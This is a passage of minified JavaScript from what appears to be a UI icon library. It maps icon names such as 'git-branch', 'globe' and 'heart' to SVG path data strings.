16h12.96s.15-.5-.22-1.36c-.38-.85-2.19-1.42-3.39-1.95zM14.99 2h-2.58l.29-.29A1.003 1.003 0 0 0 11.28.29l-2 2c-.17.18-.29.43-.29.71 0 .28.11.53.29.71l2 2a1.003 1.003 0 0 0 1.42-1.42L12.41 4h2.58c.55 0 1-.45 1-1s-.45-1-1-1z"],font:["M13.93 14.67L8.94.67h-.01C8.79.28 8.43 0 8 0s-.79.28-.93.67h-.01l-5 14h.01c-.04.1-.07.21-.07.33 0 .55.45 1 1 1 .43 0 .79-.28.93-.67h.01L5.49 11h5.02l1.55 4.34h.01c.14.38.5.66.93.66.55 0 1-.45 1-1 0-.12-.03-.23-.07-.33zM6.2 9L8 3.97 9.8 9H6.2z"],fork:["M13.7 9.29a1.003 1.003 0 0 0-1.42 1.42l.29.29H11.4l-5-5h6.17l-.29.29a1.003 1.003 0 0 0 1.42 1.42l2-2c.18-.18.29-.43.29-.71s-.11-.53-.29-.71l-2-2a1.003 1.003 0 0 0-1.42 1.42l.29.29H.99c-.55 0-1 .45-1 1s.45 1 1 1h2.59l6.71 6.71c.18.18.43.29.71.29h1.59l-.29.29a1.003 1.003 0 0 0 1.42 1.42l2-2c.18-.18.29-.43.29-.71s-.11-.53-.29-.71l-2.02-2z"],form:["M2 11v2h2v-2H2zM1 9h4c.55 0 1 .45 1 1v4c0 .55-.45 1-1 1H1c-.55 0-1-.45-1-1v-4c0-.55.45-1 1-1zm9-6h5c.55 0 1 .45 1 1s-.45 1-1 1h-5c-.55 0-1-.45-1-1s.45-1 1-1zM6 1a1.003 1.003 0 0 1 .71 1.71l-3 4C3.53 6.89 3.28 7 3 7s-.53-.11-.71-.29l-2-2a1.003 1.003 0 0 1 1.42-1.42L3 4.59l2.29-3.3C5.47 1.11 5.72 1 6 1zm4 10h5c.55 0 1 .45 1 1s-.45 1-1 1h-5c-.55 0-1-.45-1-1s.45-1 1-1z"],"full-circle":["M8 0a8 8 0 1 0 0 16A8 8 0 1 0 8 0z"],"full-stacked-chart":["M13 12h1c.55 0 1-.45 1-1V8h-3v3c0 .55.45 1 1 1zM10 2c0-.55-.45-1-1-1H8c-.55 0-1 .45-1 1v3h3V2zm0 4H7v3h3V6zm5-4c0-.55-.45-1-1-1h-1c-.55 0-1 .45-1 1v2h3V2zm0 3h-3v2h3V5zM5 5H2v3h3V5zm-2 7h1c.55 0 1-.45 1-1V9H2v2c0 .55.45 1 1 1zm12 1H2c-.55 0-1 .45-1 1s.45 1 1 1h13c.55 0 1-.45 1-1s-.45-1-1-1zM5 2c0-.55-.45-1-1-1H3c-.55 0-1 .45-1 1v2h3V2zm3 10h1c.55 0 1-.45 1-1v-1H7v1c0 .55.45 1 1 1z"],fullscreen:["M3.41 2H5c.55 0 1-.45 1-1s-.45-1-1-1H1C.45 0 0 .45 0 1v4c0 .55.45 1 1 1s1-.45 1-1V3.41L5.29 6.7c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71L3.41 2zM6 9c-.28 0-.53.11-.71.29L2 12.59V11c0-.55-.45-1-1-1s-1 .45-1 1v4c0 .55.45 1 1 1h4c.55 0 1-.45 1-1s-.45-1-1-1H3.41l3.29-3.29c.19-.18.3-.43.3-.71 0-.55-.45-1-1-1zm9 1c-.55 0-1 .45-1 1v1.59L10.71 9.3A.965.965 0 0 0 10 9a1.003 1.003 0 0 0-.71 1.71l3.3 3.29H11c-.55 0-1 .45-1 1s.45 1 1 1h4c.55 0 1-.45 1-1v-4c0-.55-.45-1-1-1zm0-10h-4c-.55 0-1 .45-1 1s.45 1 1 1h1.59l-3.3 3.29a1.003 1.003 0 0 0 1.42 1.42L14 3.41V5c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1z"],function:["M8.12 4.74H6.98c.33-1.29.75-2.24 1.28-2.84.33-.37.64-.56.95-.56.06 0 .11.02.15.05.04.04.06.09.06.15 0 .05-.04.15-.13.29-.09.14-.13.28-.13.4 0 .18.07.33.2.46.14.13.31.19.52.19.22 0 .41-.08.56-.23.15-.16.23-.37.23-.63 0-.3-.11-.55-.34-.74C10.1 1.09 9.74 1 9.24 1c-.78 0-1.49.22-2.12.67-.64.45-1.24 1.2-1.81 2.23-.2.36-.38.59-.56.69-.18.1-.46.15-.85.15l-.26.9h1.08l-1.59 6.12c-.27 1.01-.44 1.63-.54 1.86-.14.34-.34.63-.62.87-.11.1-.24.15-.4.15a.15.15 0 0 1-.11-.04l-.04-.05c0-.03.04-.08.12-.16.08-.08.12-.2.12-.36 0-.18-.06-.33-.19-.44-.12-.12-.3-.18-.54-.18-.28 0-.51.08-.68.23-.16.14-.25.32-.25.53 0 .22.1.42.31.59.21.17.53.25.97.25.7 0 1.32-.18 1.87-.54.54-.36 1.02-.92 1.42-1.67.41-.75.82-1.96 1.25-3.63l.91-3.54h1.1l.29-.89zm5.43 1.52c.2-.15.41-.23.62-.23.08 0 .23.03.45.09s.41.09.57.09c.23 0 .42-.08.57-.23.16-.16.24-.36.24-.61 0-.26-.08-.47-.23-.62-.15-.15-.37-.23-.66-.23-.25 0-.5.06-.72.18-.23.12-.51.38-.86.78-.26.3-.64.81-1.15 1.55-.2-.91-.55-1.75-1.05-2.51l-2.72.46-.06.29c.2-.04.37-.06.51-.06.27 0 .49.11.67.34.28.36.67 1.45 1.17 3.26-.39.52-.66.85-.8 1.01-.24.26-.44.42-.59.5-.12.06-.25.09-.41.09-.11 0-.3-.06-.56-.18-.18-.08-.34-.12-.48-.12-.27 0-.48.08-.66.25-.17.17-.26.38-.26.64 0 .25.08.44.24.6.16.15.37.23.64.23.26 0 .5-.05.73-.16.23-.11.52-.34.86-.69.35-.35.82-.9 1.43-1.67.23.73.44 1.25.61 1.58s.37.57.59.71c.22.15.5.22.83.22.32 0 .65-.11.98-.34.44-.3.88-.81 1.34-1.53l-.26-.15c-.31.43-.54.7-.69.8-.1.07-.22.1-.35.1-.16 0-.32-.1-.48-.3-.27-.34-.62-1.27-1.06-2.8.4-.68.73-1.13 1-1.34z"],"gantt-chart":["M10 10c0 .55.45 1 1 1h4c.55 0 1-.45 1-1s-.45-1-1-1h-4c-.55 0-1 .45-1 1zM6 7c0 .55.45 1 1 1h4c.55 0 1-.45 1-1s-.45-1-1-1H7c-.55 0-1 .45-1 1zm9 5H2V3c0-.55-.45-1-1-1s-1 .45-1 1v10c0 .55.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zM4 5h3c.55 0 1-.45 1-1s-.45-1-1-1H4c-.55 0-1 .45-1 1s.45 1 1 1z"],geolocation:["M-.01 6.66l7.34 2 2 7.33 6.66-16z"],geosearch:["M8.82 12.4h.66c.23 0 .36-.17.36-.4v-1.48l.19-.18c-.27.03-.55.06-.83.06-.28 0-.56-.03-.84-.07.02.04.05.08.07.13V12c0 .23.15.4.39.4zM6.4 15.1A5.51 5.51 0 0 1 .9 9.6c0-.49.06-.98.18-1.43.03 0 .05-.01.08-.01h.08v.44c0 .19.17.34.36.34.03 0 .07-.01.1-.01l.71.7c.07.07.19.07.26 0s.07-.19 0-.26l-.7-.72c0-.02.03-.03.03-.05v-.11c0-.15.08-.2.23-.33h.42c.08 0 .15-.01.22-.04h.02c.02-.02.03-.02.04-.04.01-.01.01-.01.02-.01l.02-.01.9-.9c-.13-.26-.24-.52-.34-.8h-.5v-.43c0-.01.05.05.04-.08h.31c-.03-.13-.06-.26-.08-.39h-.57c.16-.12.34-.24.51-.36-.02-.23-.04-.46-.04-.7 0-.12.01-.23.02-.34A6.385 6.385 0 0 0 0 9.6C0 13.13 2.87 16 6.4 16c3.1 0 5.67-2.22 6.26-5.15l-.78-.88c-.21 2.85-2.58 5.13-5.48 5.13zm-1.7-2.93v-.28h.12c.23 0 .39-.19.39-.42v-.54s.01-.01 0-.01L3.77 9.45h-.62c-.23 0-.38.19-.38.42v1.6c0 .23.14.42.38.42h.26v1.61c0 .23.22.41.45.41s.45-.18.45-.41v-.97H4.3c.24 0 .4-.13.4-.36zm11.07-2.34l-2.94-2.94c.11-.17.21-.34.3-.52.01-.03.03-.06.04-.09.08-.18.16-.36.22-.55v-.01c.06-.19.1-.38.14-.58.01-.05.01-.09.02-.14.03-.2.05-.4.05-.61a4.4 4.4 0 0 0-4.4-4.4C6.77 0 4.8 1.97 4.8 4.4s1.97 4.4 4.4 4.4c.21 0 .41-.02.61-.05.04 0 .09-.01.14-.02.2-.03.39-.08.58-.14h.01c.19-.06.37-.14.55-.22.03-.01.06-.03.09-.04.18-.09.35-.19.52-.3l2.94 2.94a.8.8 0 0 0 .57.23c.44 0 .8-.36.8-.8a.895.895 0 0 0-.24-.57zM9.2 7.6C7.43 7.6 6 6.17 6 4.4c0-1.77 1.43-3.2 3.2-3.2s3.2 1.43 3.2 3.2c0 1.77-1.43 3.2-3.2 3.2zm1.54 4.26v-.52c0-.09-.1-.17-.19-.17s-.19.07-.19.17v.52c0 .09.1.17.19.17s.19-.07.19-.17z"],"git-branch":["M12 1c-1.66 0-3 1.34-3 3 0 1.25.76 2.32 1.85 2.77A2.02 2.02 0 0 1 9 8H7c-.73 0-1.41.2-2 .55V5.82C6.16 5.4 7 4.3 7 3c0-1.66-1.34-3-3-3S1 1.34 1 3c0 1.3.84 2.4 2 2.82v4.37c-1.16.4-2 1.51-2 2.81 0 1.66 1.34 3 3 3s3-1.34 3-3c0-1.04-.53-1.95-1.32-2.49.35-.31.81-.51 1.32-.51h2c1.92 0 3.52-1.35 3.91-3.15A2.996 2.996 0 0 0 12 1zM4 2c.55 0 1 .45 1 1s-.45 1-1 1-1-.45-1-1 .45-1 1-1zm0 12c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zm8-9c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"],"git-commit":["M15 7h-3.14c-.45-1.72-2-3-3.86-3S4.59 5.28 4.14 7H1c-.55 0-1 .45-1 1s.45 1 1 1h3.14c.45 1.72 2 3 3.86 3s3.41-1.28 3.86-3H15c.55 0 1-.45 1-1s-.45-1-1-1zm-7 3c-1.1 0-2-.9-2-2s.9-2 2-2 2 .9 2 2-.9 2-2 2z"],"git-merge":["M12 6c-1.3 0-2.4.84-2.82 2H9c-1.62 0-3-.96-3.63-2.34C6.33 5.16 7 4.16 7 3c0-1.66-1.34-3-3-3S1 1.34 1 3c0 1.3.84 2.4 2 2.81v4.37C1.84 10.6 1 11.7 1 13c0 1.66 1.34 3 3 3s3-1.34 3-3c0-1.3-.84-2.4-2-2.82V8.43A5.89 5.89 0 0 0 9 10h.18A2.996 2.996 0 0 0 15 9c0-1.66-1.34-3-3-3zm-8 8c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zM4 4c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zm8 6c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"],"git-new-branch":["M14 2h-1V1c0-.55-.45-1-1-1s-1 .45-1 1v1h-1c-.55 0-1 .45-1 1s.45 1 1 1h1v1c0 .55.45 1 1 1s1-.45 1-1V4h1c.55 0 1-.45 1-1s-.45-1-1-1zm-3.18 4.8C10.51 7.51 9.82 8 9 8H7c-.73 0-1.41.2-2 .55V5.82C6.16 5.4 7 4.3 7 3c0-1.66-1.34-3-3-3S1 1.34 1 3c0 1.3.84 2.4 2 2.82v4.37c-1.16.4-2 1.51-2 2.81 0 1.66 1.34 3 3 3s3-1.34 3-3c0-1.04-.53-1.95-1.32-2.49.35-.31.81-.51 1.32-.51h2c1.9 0 3.49-1.33 3.89-3.11-.29.07-.58.11-.89.11-.41 0-.8-.08-1.18-.2zM4 2c.55 0 1 .45 1 1s-.45 1-1 1-1-.45-1-1 .45-1 1-1zm0 12c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"],"git-pull":["M3 1C1.34 1 0 2.34 0 4c0 1.3.84 2.4 2 2.82v3.37C.84 10.6 0 11.7 0 13c0 1.66 1.34 3 3 3s3-1.34 3-3c0-1.3-.84-2.4-2-2.82V6.82C5.16 6.4 6 5.3 6 4c0-1.66-1.34-3-3-3zm0 13c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zm0-9c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zm11 5.18V6c0-1.66-1.34-3-3-3H9.41l1.29-1.29c.19-.18.3-.43.3-.71A1.003 1.003 0 0 0 9.29.29l-3 3C6.11 3.47 6 3.72 6 4c0 .28.11.53.29.71l3 3a1.003 1.003 0 0 0 1.42-1.42L9.41 5H11c.55 0 1 .45 1 1v4.18A2.996 2.996 0 0 0 13 16c1.66 0 3-1.34 3-3 0-1.3-.84-2.4-2-2.82zM13 14c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"],"git-push":["M4 6h1V5H4v1zm9 3c0-.28-.11-.53-.29-.71l-3-3C9.53 5.11 9.28 5 9 5s-.53.11-.71.29l-3 3a1.003 1.003 0 0 0 1.42 1.42L8 8.41V15c0 .55.45 1 1 1s1-.45 1-1V8.41l1.29 1.29c.18.19.43.3.71.3.55 0 1-.45 1-1zM5 3H4v1h1V3zm10-3H1C.45 0 0 .45 0 1v13c0 .55.45 1 1 1h5v-2H2v-1h4v-1H3V2h11v9h-2v1h2v1h-2v2h3c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1z"],"git-repo":["M5 9H4v1h1V9zm10-9H1C.45 0 0 .45 0 1v13c0 .55.45 1 1 1h3v1l2-1 2 1v-1h7c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zM4 13H2v-1h2v1zm10 0H8v-1h6v1zm0-2H3V2h11v9zM5 3H4v1h1V3zm0 4H4v1h1V7zm0-2H4v1h1V5z"],glass:["M2 0v4c0 2.97 2.16 5.43 5 5.91V14H5c-.55 0-1 .45-1 1s.45 1 1 1h6c.55 0 1-.45 1-1s-.45-1-1-1H9V9.91c2.84-.48 5-2.94 5-5.91V0H2z"],globe:["M4.45 7.83c-.26 0-.41.21-.41.46v1.75c0 .26.16.46.41.46h.29v1.77c0 .25.24.45.49.45s.49-.2.49-.45V11.2h-.01c.26 0 .44-.14.44-.4v-.3h.14c.26 0 .43-.2.43-.46v-.59s.01-.01 0-.01l-1.58-1.6h-.69zM8.51 3.9h.22c.06 0 .12-.01.12-.07 0-.06-.05-.07-.12-.07h-.22c-.06 0-.12.01-.12.07.01.06.06.07.12.07zm-2.33-.05c.07-.07.07-.19 0-.26l-.5-.5a.187.187 0 0 0-.26 0c-.07.07-.07.19 0 .26l.5.5c.07.07.19.07.26 0zm3.06.89c.07 0 .14-.06.14-.12v-.31c0-.07-.07-.12-.14-.12s-.14.06-.14.12v.31c0 .07.07.12.14.12zM8 0C3.58 0 0 3.58 0 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zm0 14c-3.31 0-6-2.69-6-6 0-.55.1-1.07.23-1.57h.11v.47c0 .2.18.37.39.37.03 0 .08-.01.11-.02l.78.77c.08.08.2.08.28 0 .08-.08.08-.2 0-.28l-.75-.78c0-.02.04-.04.04-.06v-.12c0-.16.09-.22.25-.36h.46c.09 0 .17-.01.24-.05h.02c.02-.01.03-.02.05-.03.01-.01.01-.01.02-.01l.02-.02 1.59-1.58c.18-.18.18-.46 0-.64s-.47-.15-.65.03l-.3.34h-.57v-.48c0-.01.05.05.05-.09h.64c.12 0 .22-.09.22-.21s-.1-.21-.22-.21H4.1c.18-.15.34-.31.54-.44l.01-.01c.21-.14.45-.25.68-.37.15-.07.29-.15.44-.21.17-.07.35-.11.53-.17.18-.05.35-.12.53-.16a6.05 6.05 0 0 1 3.47.35c.05.02.1.05.16.08.25.11.48.24.71.39.25.16.49.34.71.55H10.6s0-.03-.01-.03c-.04 0-.09 0-.13.03l-.51.51a.17.17 0 0 0 0 .23c.06.06.17.06.23 0l.42-.44.01-.02h.25c0 .14-.07.09-.07.12v.07c0 .22-.15.37-.36.37h-.38c-.19 0-.38.21-.38.4v.17h-.1c-.12 0-.2.06-.2.18v.25h-.23c-.17 0-.3.11-.3.28 0 .17.13.26.3.26.07 0 .14.03.19-.11l.04.01.49-.46h.17l.39.37c.03.03.08.02.12-.01.03-.03.03-.12 0-.15l-.32-.35h.23l.09.12c.18.18.48.17.66-.01l.09-.1h.4c.02 0 .08.05.08.05v.24l-.05-.01h-.36c-.11 0-.21.1-.21.21 0 .11.09.21.21.21h.41v.15c-.14.21-.24.42-.45.42h-.94v-.01l-.44-.44a.47.47 0 0 0-.66 0l-.42.43v.01H8.6c-.26 0-.49.21-.49.46v.92c0 .26.23.45.49.45h.9c.34.14.57.35.72.69v1.68c0 .26.17.44.42.44h.72c.26 0 .4-.18.4-.44V9l.89-.86.03-.02.02-.01h.03c.07-.08.15-.19.15-.31v-.91c0-.18-.16-.32-.31-.46H13c.01.28.21.42.46.42h.42c.08.37.12.76.12 1.15 0 3.31-2.69 6-6 6zm4.54-4.27c-.1 0-.21.08-.21.18v.57c0 .1.11.18.21.18.1 0 .21-.08.21-.18v-.57c0-.1-.11-.18-.21-.18zM8.37 3.19c0-.25-.2-.42-.46-.42h-.54c-.25 0-.42.18-.42.43 0 .03-.1.04.05.08v.47c0 .15.06.27.21.27s.21-.12.21-.27v-.14h.5c.24 0 .45-.16.45-.42z"],"globe-network":["M8 0C3.58 0 0 3.58 0 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zm5.17 5h-2.44c-.21-1.11-.51-2.03-.91-2.69 1.43.46 2.61 1.43 3.35 2.69zM10 8c0 .73-.05 1.39-.12 2H6.12C6.05 9.39 6 8.73 6 8s.05-1.39.12-2h3.76c.07.61.12 1.27.12 2zM8 2c.67 0 1.36 1.1 1.73 3H6.27C6.64 3.1 7.33 2 8 2zm-1.82.31c-.4.66-.71 1.58-.91 2.69H2.83a6.025 6.025 0 0 1 3.35-2.69zM2 8c0-.7.13-1.37.35-2h2.76C5.04 6.62 5 7.28 5 8s.04 1.38.11 2H2.35C2.13 9.37 2 8.7 2 8zm.83 3h2.44c.21 1.11.51 2.03.91 2.69A6.025 6.025 0 0 1 2.83 11zM8 14c-.67 0-1.36-1.1-1.73-3h3.46c-.37 1.9-1.06 3-1.73 3zm1.82-.31c.4-.66.7-1.58.91-2.69h2.44a6.025 6.025 0 0 1-3.35 2.69zM13.65 10h-2.76c.07-.62.11-1.28.11-2s-.04-1.38-.11-2h2.76c.22.63.35 1.3.35 2s-.13 1.37-.35 2z"],graph:["M14 3c-1.06 0-1.92.83-1.99 1.88l-1.93.97A2.95 2.95 0 0 0 8 5c-.56 0-1.08.16-1.52.43L3.97 3.34C3.98 3.23 4 3.12 4 3c0-1.1-.9-2-2-2s-2 .9-2 2 .9 2 2 2c.24 0 .47-.05.68-.13l2.51 2.09C5.08 7.29 5 7.63 5 8c0 .96.46 1.81 1.16 2.35l-.56 1.69c-.91.19-1.6.99-1.6 1.96 0 1.1.9 2 2 2s2-.9 2-2c0-.51-.2-.97-.51-1.32l.56-1.69A2.99 2.99 0 0 0 11 8c0-.12-.02-.24-.04-.36l1.94-.97c.32.21.69.33 1.1.33 1.1 0 2-.9 2-2s-.9-2-2-2z"],"graph-remove":["M12.89 8.11l-.01.01-.38-.38-.38.38-.02-.02c-.54.55-1.27.9-2.1.9-1.66 0-3-1.34-3-3 0-.83.35-1.56.9-2.1l-.02-.02.38-.38-.38-.38.01-.01C7.35 2.57 7 1.83 7 1c0-.34.07-.65.17-.96A8.004 8.004 0 0 0 0 8c0 4.42 3.58 8 8 8 4.14 0 7.54-3.14 7.96-7.17-.31.1-.62.17-.96.17-.83 0-1.57-.35-2.11-.89zm1.02-4.61l1.79-1.79c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-1.79 1.8L10.71.3A.965.965 0 0 0 10 0a1.003 1.003 0 0 0-.71 1.71l1.79 1.79-1.79 1.79a1.003 1.003 0 0 0 1.42 1.42l1.79-1.79 1.79 1.79a1.003 1.003 0 0 0 1.42-1.42l-1.8-1.79z"],grid:["M15 9c.55 0 1-.45 1-1s-.45-1-1-1h-1V4h1c.55 0 1-.45 1-1s-.45-1-1-1h-1V1c0-.55-.45-1-1-1s-1 .45-1 1v1H9V1c0-.55-.45-1-1-1S7 .45 7 1v1H4V1c0-.55-.45-1-1-1S2 .45 2 1v1H1c-.55 0-1 .45-1 1s.45 1 1 1h1v3H1c-.55 0-1 .45-1 1s.45 1 1 1h1v3H1c-.55 0-1 .45-1 1s.45 1 1 1h1v1c0 .55.45 1 1 1s1-.45 1-1v-1h3v1c0 .55.45 1 1 1s1-.45 1-1v-1h3v1c0 .55.45 1 1 1s1-.45 1-1v-1h1c.55 0 1-.45 1-1s-.45-1-1-1h-1V9h1zm-8 3H4V9h3v3zm0-5H4V4h3v3zm5 5H9V9h3v3zm0-5H9V4h3v3z"],"grid-view":["M0 1v6h7V0H1C.45 0 0 .45 0 1zm0 14c0 .55.45 1 1 1h6V9H0v6zM15 0H9v7h7V1c0-.55-.45-1-1-1zM9 16h6c.55 0 1-.45 1-1V9H9v7z"],"group-objects":["M5 6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm6-3H5C2.24 3 0 5.24 0 8s2.24 5 5 5h6c2.76 0 5-2.24 5-5s-2.24-5-5-5zm0 9H5c-2.21 0-4-1.79-4-4s1.79-4 4-4h6c2.21 0 4 1.79 4 4s-1.79 4-4 4zm0-6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2z"],"grouped-bar-chart":["M10 12c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1s-1 .45-1 1v8c0 .55.45 1 1 1zm3 0c.55 0 1-.45 1-1V6c0-.55-.45-1-1-1s-1 .45-1 1v5c0 .55.45 1 1 1zm2 1H1c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zm-9-1c.55 0 1-.45 1-1V8c0-.55-.45-1-1-1s-1 .45-1 1v3c0 .55.45 1 1 1zm-3 0c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1s-1 .45-1 1v9c0 .55.45 1 1 1z"],hand:["M15 5c0-.55-.45-1-1-1-.41 0-.76.24-.91.59v.01s0 .01-.01.01L11.57 8h-.36l.78-4.84C12 3.11 12 3.05 12 3a1 1 0 1 0-1.99-.16v.01L9.18 8H9V1c0-.55-.45-1-1-1S7 .45 7 1v7h-.09l-.93-5.18A1 1 0 0 0 5 2c-.55 0-1 .45-1 1 0 .05 0 .11.01.16L5.26 11h-.04L2.83 7.44C2.65 7.18 2.35 7 2 7c-.55 0-1 .45-1 1 0 .17.04.33.12.47l3 5.69h.01v.01A5.002 5.002 0 0 0 13 11v-.59l1.93-5.05c.05-.11.07-.23.07-.36z"],"hand-down":["M14.72 7.87c-1.54-.67-2.99-2.68-3.7-3.95C10.11 1.95 9.93 0 6.14 0 4.05 0 2.71.61 1.92 2.12 1.27 3.36 1 5.21 1 7.83v.79c0 .65.6 1.18 1.35 1.18.34 0 .64-.11.88-.29.17.48.68.84 1.29.84.41 0 .78-.16 1.03-.42.23.37.67.63 1.19.63.57 0 1.05-.31 1.25-.74l.01.63v4.05c0 .83.67 1.5 1.5 1.5s1.5-.67 1.5-1.5V7.9c.58.41 1.55 1.21 2.47 1.29 1.57.14 1.82-1.07 1.25-1.32z"],"hand-left":["M12.08 4.97c-1.26-.71-3.27-2.15-3.95-3.7C7.88.7 6.67.96 6.81 2.52c.09.93.89 1.9 1.3 2.48H1.5C.67 5 0 5.67 0 6.5S.67 8 1.5 8h4.05l.63.01c-.44.2-.75.69-.75 1.25 0 .52.26.96.63 1.19-.26.25-.42.61-.42 1.03 0 .61.35 1.12.84 1.29-.18.24-.29.54-.29.88 0 .75.54 1.35 1.19 1.35h.79c2.62 0 4.47-.28 5.71-.92 1.51-.79 2.12-2.14 2.12-4.22 0-3.79-1.95-3.97-3.92-4.89z"],"hand-right":["M14.5 5H7.89c.41-.58 1.21-1.55 1.3-2.47C9.34.97 8.12.71 7.87 1.28c-.67 1.54-2.68 2.99-3.95 3.7C1.95 5.89 0 6.07 0 9.86c0 2.09.61 3.43 2.12 4.22 1.24.65 3.09.92 5.71.92h.79c.65 0 1.18-.6 1.18-1.35 0-.34-.11-.64-.29-.88.48-.17.84-.68.84-1.29 0-.41-.16-.78-.42-1.03.37-.23.63-.67.63-1.19 0-.57-.31-1.05-.74-1.25l.63-.01h4.05c.83 0 1.5-.67 1.5-1.5S15.33 5 14.5 5z"],"hand-up":["M13.65 6.19c-.34 0-.64.11-.88.29-.17-.48-.68-.84-1.29-.84-.41 0-.78.16-1.03.42-.23-.37-.67-.63-1.19-.63-.57 0-1.05.31-1.25.74L8 5.55V1.5C8 .67 7.33 0 6.5 0S5 .67 5 1.5v6.61c-.58-.41-1.55-1.21-2.48-1.3C.96 6.67.7 7.88 1.28 8.13c1.54.67 2.99 2.68 3.7 3.95C5.89 14.05 6.07 16 9.86 16c2.09 0 3.43-.61 4.22-2.12.64-1.24.92-3.09.92-5.71v-.79c0-.65-.6-1.19-1.35-1.19z"],header:["M13 1c-.55 0-1 .45-1 1v5H4V2c0-.55-.45-1-1-1s-1 .45-1 1v12c0 .55.45 1 1 1s1-.45 1-1V9h8v5c0 .55.45 1 1 1s1-.45 1-1V2c0-.55-.45-1-1-1z"],"header-one":["M14.06 8c-.04.23-.12.44-.25.61-.13.17-.29.3-.48.41-.18.11-.39.18-.62.23-.23.04-.46.07-.71.07v1.03h1.74V16H15V8h-.94zM7 0c-.56 0-1 .45-1 1v4H2V1c0-.55-.45-1-1-1-.56 0-1 .45-1 1v10c0 .55.45 1 1 1 .56 0 1-.45 1-1V7h4v4c0 .55.45 1 1 1 .56 0 1-.45 1-1V1c0-.54-.45-1-1-1z"],"header-two":["M13.17 13.93c-.17.15-.33.29-.46.44-.13.16-.22.32-.27.49h3.55V16H11c.01-.65.16-1.22.44-1.71s.67-.91 1.17-1.27c.24-.18.49-.36.75-.54.25-.18.49-.36.71-.57.21-.2.39-.42.53-.65.14-.24.21-.51.22-.82 0-.14-.02-.29-.05-.45-.03-.16-.09-.31-.18-.45a1.13 1.13 0 0 0-.37-.35c-.16-.09-.37-.14-.63-.14-.24 0-.43.05-.59.15-.16.1-.29.24-.38.42-.1.17-.17.38-.21.62-.05.24-.07.5-.08.77h-1.19c0-.43.05-.83.16-1.2s.27-.69.49-.96c.21-.25.48-.46.79-.62.31-.15.67-.23 1.07-.23.45 0 .82.08 1.11.23.3.16.55.36.73.6.19.24.32.5.39.79.08.28.12.54.12.79 0 .31-.04.6-.13.85s-.22.49-.37.7c-.15.21-.32.41-.52.59s-.4.35-.61.51l-.63.45c-.21.14-.39.28-.57.42zM0 1c0-.55.44-1 1-1 .55 0 1 .46 1 1v10c0 .55-.44 1-1 1-.55 0-1-.46-1-1V1zm6 0c0-.55.44-1 1-1 .55 0 1 .46 1 1v10c0 .55-.44 1-1 1-.55 0-1-.46-1-1V1zM2 5h4v2H2V5z"],headset:["M14.85 6.34C14.18 2.72 11.37 0 8 0S1.82 2.72 1.15 6.34C.47 6.9 0 8.1 0 9.5 0 11.43.9 13 2 13c0 1.1.9 2 2 2h2c0 .55.45 1 1 1h2c.55 0 1-.45 1-1v-1c0-.55-.45-1-1-1H7c-.55 0-1 .45-1 1H4c-.55 0-1-.45-1-1 .55 0 1-.45 1-1V7c0-.45-.3-.81-.71-.94C3.97 3.7 5.81 2 8 2s4.03 1.7 4.71 4.06c-.41.13-.71.49-.71.94v5c0 .55.45 1 1 1h1c1.1 0 2-1.57 2-3.5 0-1.4-.47-2.6-1.15-3.16z"],heart:["M16 5.095c0-2.255-1.88-4.083-4.2-4.083-1.682 0-3.13.964-3.8 2.352a4.206 4.206 0 0 0-3.8-2.352C1.88 1.012 0 2.84 0 5.095c0 .066.007.13.01.194H.004c.001.047.01.096.014.143l.013.142c.07.8.321 1.663.824 2.573C2.073 10.354 4.232 12.018 8 15c3.767-2.982 5.926-4.647 7.144-6.854.501-.905.752-1.766.823-2.562.007-.055.012-.11.016-.164.003-.043.012-.088.013-.13h-.006c.003-.066.01-.13.01-.195z"],"heart-broken":["M7.71 8.87L6.17 6.55l.02-.01A.906.906 0 0 1 6 6c0-.07.03-.13.04-.19h-.02l.78-3.92C6.09 1.34 5.19 1 4.2 1 1.88 1 0 2.83 0 5.09c0 .07.01.13.01.19H0c0 .05.01.1.01.14 0 .05.01.1.01.14.07.8.32 1.66.82 2.57 1.07 1.94 2.88 3.47 5.86 5.84l-.68-2.74h.02C6.03 11.16 6 11.08 6 11c0-.28.11-.53.29-.71l1.42-1.42zM16 5.09C16 2.83 14.12 1 11.8 1c-1.2 0-2.27.5-3.04 1.28l-.7 3.51 1.77 2.66-.01.01c.1.15.18.33.18.54 0 .28-.11.53-.29.71l-1.6 1.6.75 3.01c3.23-2.56 5.16-4.15 6.28-6.18.5-.91.75-1.77.82-2.56.01-.05.01-.11.02-.16 0-.04.01-.09.01-.13h-.01c.01-.07.02-.14.02-.2z"],"heat-grid":["M0 10h5V7H0v3zm1-2h3v1H1V8zm14-5h-4v3h5V4c0-.55-.45-1-1-1zm0 2h-3V4h3v1zM0 4v2h5V3H1c-.55 0-1 .45-1 1zm0 9c0 .55.45 1 1 1h4v-3H0v2zm6-7h4V3H6v3zm0 8h4v-3H6v3zm1-2h2v1H7v-1zm4 2h4c.55 0 1-.45 1-1v-2h-5v3zm0-4h5V7h-5v3zm-5 0h4V7H6v3z"],heatmap:["M2 11c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm11-7c1.1 0 2-.9 